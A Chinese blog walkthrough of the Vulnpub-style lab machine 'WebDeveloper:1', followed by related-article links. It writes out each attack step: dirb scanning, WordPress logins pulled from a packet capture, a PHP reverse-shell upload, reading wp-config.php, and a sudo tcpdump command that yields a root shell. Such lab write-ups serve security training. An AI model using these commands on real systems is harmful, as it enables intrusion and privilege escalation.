WebDeveloper:1

最新推荐文章于 2024-08-28 21:08:08 发布
最新推荐文章于 2024-08-28 21:08:08 发布
阅读量218 收藏 5
点赞数 2
文章标签: 网络 安全 测试工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53626662/article/details/141193185
版权

一、主机发现

二、信息收集

1.目录扫描

dirb http://192.168.7.32

扫描出目录ipdata

拼接访问/ipdata,显示流量包

2.使用Wireshark打开流量包,根据图片提示找到账号密码

webdeveloper:Te5eQg&4sBS!Yr$)wf%(DcAd

3.拼接/wp-admin,使用刚刚的账号密码进行登录

登陆成功

三、信息利用

1.上传文件路径如下

2.使用kali自带反弹监听代码,在

/usr/share/webshells/php/php-reverse-shell.php

对文件进行编辑,改变ip和port

3.上传的文件在wp-content/uploads/ ,拼接访问,在第二个目录的第一个目录里,找到点击

4.kali监听成功

四、提权

1.获取交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

2.进入文件,找到wordpress账号密码

/var/www/html/wp-config.php

webdeveloper : MasterOfTheUniverse

3.ssh登录

ssh webdeveloper@192.168.7.32 //随即输入上述密码

2.sudo -l

到辅助网站查找利用方式

依次执行

echo $'php /var/www/html/wp-content/uploads/2022/01/php-reverse-shell.php' > /tmp/.shell
chmod +x /tmp/.shell
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell -Z root

kali监听得到root权限

蓝天模糊
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub:WebDeveloper:1靶机
qq_43884092的博客
03-27 234
目录爆破发现ipdata目录,进入该目录发现一个流量包,下载使用wireshark打开,查看/var/www/html/wp-config.php获得数据库账号密码,同时该密码也是系统用户webdeveloper的密码
vulnhub Web Developer: 1
箭雨镜屋
01-02 1936
本文思路: nmap扫描---->dirb扫描---->wireshark分析.cap文件发现wordpress用户名和密码---->利用wordpress的上传theme功能getshell---->用linpeas.sh找到webdeveloper用户账号密码---->利用tcpdump命令进行sudo提权
vulnhub靶场,WEB DEVELOPER: 1
kukudeshuo的博客
12-21 943
vulnhub靶场,WEB DEVELOPER: 1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/web-developer-1,288/ 攻击机:kali(192.168.109.128) 靶机:WEB DEVELOPER: 1(192.168.109.191) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:获取到root权限下的flag 信息收集 使用arp-scan查看确定目标靶机
WebDeveloper:1靶机
m0_65285254的博客
08-14 365
var/www/html/目录下 ,查看 wp-config.php 文件。ssh连接 ssh webdeveloper@192.168.153.158。上传的文件在wp-content/uploads/目录下。找到 php-reverse-shell.php文件位置。密码:Te5eQg&4sBS!靶机ip地址为192.168.153.158。拼接 /wp-login.php。账号:webdeveloper。账号:webdeveloper。将ip地址改成kali的ip。
vulnhub靶场,WEB DEVELOPER:1——新手进阶2
m0_75051044的博客
01-25 1928
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式,使攻击机和靶机的网络连接一样。然后浏览器访问http://192.168.109.191//wp-content/themes/twentysixteen/404.php。发现数据库的用户名和密码,尝试使用这个用户名和密码进行ssh远程连接(可以重新开启一个终端窗口,方便操作)使用arp-scan -l扫描确定靶机ip,当然也可以用nmap和netdiscover。
coursera-webDeveloper:Coursera测试库
02-16
在`coursera-webDeveloper-main`中,可能有`.git`目录,表明项目使用了Git进行版本控制,也可能有配置文件(如`package.json`),暗示项目使用了npm管理依赖并执行构建任务。 【响应式设计】 响应式设计是确保网页...
web-developer:网站开发者
03-28
Web开发人员 网站开发者
Complete-webdeveloper-course:Webdeveloper课程文件
03-04
在这个名为"Complete-webdeveloper-course"的综合Web开发课程中,我们主要关注的是HTML(超文本标记语言)的学习,这是构建网页内容的基础。HTML是互联网上所有网页的核心,它定义了页面的结构和内容。通过这个课程...
WEB-developer:一些实验项目
05-22
【标题】:“WEB-developer:一些实验项目” 这个标题表明我们正在探讨的是一个与Web开发者相关的项目集合,可能包括一系列的实践练习或者示例代码,旨在帮助开发者检验和提升他们在HTML(超文本标记语言)和CSS...
浏览器发送HTTP请求的过程
学Python的小白!
08-25 1493
浏览器发送HTTP请求的过程是一个复杂但有序的步骤,‌主要包括以下几个阶段:‌1.构建请求,2.查找缓存、3.DNS解析、4.建立TCP连接、5.发送HTTP请求、6.服务器处理请求、7.服务器发送响应、8.客户端处理响应、9.关闭连接。
服务器远程管理
m0_64827698的博客
08-26 572
SSH两种级别的安全认证:基于口令(口令在网络上传播,易受中间人攻击),基于密钥(传公钥,公钥是否相同,公钥加密质询,私钥解密)(密钥不在网络上传)2.启用服务services.msc(telnet)/配置远程桌面服务gpedit.msc(rdp)/使⽤SSH,你可以把所有传输的数据进⾏加密,这样“中间 ⼈”这种攻击⽅式就不可能实现了。实验总结:在windows开启telnet服务(2019不支持),RDP服务,SSH。SSH协议允许⽤户通过配置⽂件⾃定义选择加密算法,以优化安全性和性能。
哪些类型的企业需要开展TPM管理培训?
tianxingjian713的博客
08-23 1272
例如汽车制造企业、电子制造企业等,这些企业的生产线通常由大量高精度的自动化设备组成,一旦设备出现故障,可能会导致整个生产线停产,造成巨大的经济损失。开展TPM管理培训可以提高员工对设备的维护和管理能力,延长设备的使用寿命,降低设备维修成本,提高物流服务的效率和质量。通过开展TPM管理培训,让设备操作人员、维护人员和管理人员共同参与设备维护,实现设备的零故障运行,从而提高企业的竞争力。通过开展TPM管理培训,让员工了解设备的运行原理和风险点,加强设备的日常巡检和维护,提高设备的安全性和可靠性。
系统编程 网络 http协议
qq_69971969的博客
08-24 808
--------------------------------------表示了资源所在的路径。意思:域名解析=>把对应的域名解析为对应的ip。<协议>://<主机>:<端口>/<路径>万维网:http解决万维网之间互联互通。http:应用层协议,底层是tcp协议。http协议------应用层的协议。1.如何在万维网中表示一个资源?http协议加密:tls,ssl。计算机web网络只能看到文字。<http>只是协议的一种。html 超文本标记语言。http 超文本传输协议。
33.python socket
笔生花的博客
08-27 1130
python socket 心跳包 数据包
SSH是什么?
思索的涟漪,突破自我
08-28 245
SSH的工作原理可以简单理解为,它在用户和服务器之间建立了一条“安全隧道”,通过这条隧道传输的数据都被加密,防止中间人攻击或数据泄露。公钥认证的原理是用户在本地生成一对密钥,其中公钥存放在服务器上,私钥则保存在本地。在现代互联网环境中,安全性越来越受到重视,SSH凭借其强大的加密能力和灵活的认证方式,成为了维护网络安全的重要工具之一。使用SSH时,用户只需要在终端或命令行界面输入简单的命令,就可以连接到远程服务器,执行各种操作,如文件传输、远程执行命令,甚至通过端口转发实现复杂的网络功能。
2024年入职/转行网络安全,该如何规划?_网络安全职业规划
2401_85023531的博客
08-23 1593
前段时间,知名机构麦可思研究院发布了《2022年中国本科生就业报告》,其中详细列出近五年的本科绿牌专业,其中,信息安全位列第一。
【CVPR‘24】BP-Net:用于深度补全的双边传播网络,新 SOTA!
最新发布
梁瑛平的博客
08-28 199
深度补全任务旨在从稀疏的深度测量数据和同步的彩色图像中生成密集的深度图。现有的最先进方法多为基于传播的,通常作为对初始估计的密集深度的迭代改进。然而,这些初始深度估计通常直接将卷积层应用于稀疏深度图。在本文中,我们提出了一种双边传播网络(BP-Net),在最早阶段进行深度传播,以避免直接在稀疏数据上进行卷积。具体而言,我们的方法通过一个非线性模型从附近的深度测量中传播目标深度,该模型的系数由一个多层感知器生成,并基于辐射差异和空间距离进行调整。
动态代理和静态代理的区别,动态代理怎么提高网络安全
yls5yl的博客
08-28 310
动态代理通过不断变化的IP地址,不仅在网络匿名性、隐私保护和抗攻击方面具有显著优势,还能有效提升用户的网络安全性。尽管与静态代理相比,动态代理可能在稳定性方面有所欠缺,但在现代复杂的网络环境中,它依然是保障网络安全的强大工具。了解并正确使用动态代理,将帮助用户在网络世界中游刃有余,最大程度地保护自己的隐私和数据安全
配置ospf单区域
m0_70063775的博客
08-26 1049
OSPF是一种基于链路状态的路由协议,可以将链路视为路由器的接口。链路状态是对接口及接口与相邻路由器的关系的描述。例如接口的信息包括接口的IP地址、掩码、所连接的网络的类型、连接的邻居等。所有这些链路状态的集合形成链路状态数据库。OSPF共有8种状态机,分别是:Down、Attempt、Init、2-way、Exstart、Exchange、Loading、Full。邻居会话的初始阶段,表明没有在邻居失效时间间隔内收到来自邻居路由器的Hello数据包。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值